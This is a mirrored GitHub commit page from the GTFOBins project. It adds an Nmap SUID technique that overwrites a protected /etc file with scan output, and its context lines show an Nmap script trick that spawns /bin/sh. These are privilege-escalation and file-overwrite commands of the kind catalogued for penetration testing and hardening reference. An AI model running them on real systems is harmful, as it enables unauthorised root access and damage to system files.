mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Adding another usage of Nmap's SUID
I came along with this method on stackoverflow while trying to execute commands using a SUID nmap binary, though `--script` failed me but this works. Could be enough to demonstrate effect of using SUID on Nmap. I've yet to come up with a way to over-write the contents of the system file according to what we want, with this we can only over-write files with nmap output. ```bash sudo touch /etc/filecantbetouched nmap 127.0.0.1 -oN=/etc/filecantbetouched cat /etc/filecantbetouched ```
This commit is contained in:
parent
1c07880178
commit
edc8a2d03d
@ -108,4 +108,9 @@ functions:
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
./nmap --script=$TF
|
||||
- description: This will over-write files with nmap output, use with caution.
|
||||
code: |
|
||||
sudo touch /etc/filecantbetouched
|
||||
nmap 127.0.0.1 -oN=/etc/filecantbetouched
|
||||
cat /etc/filecantbetouched
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user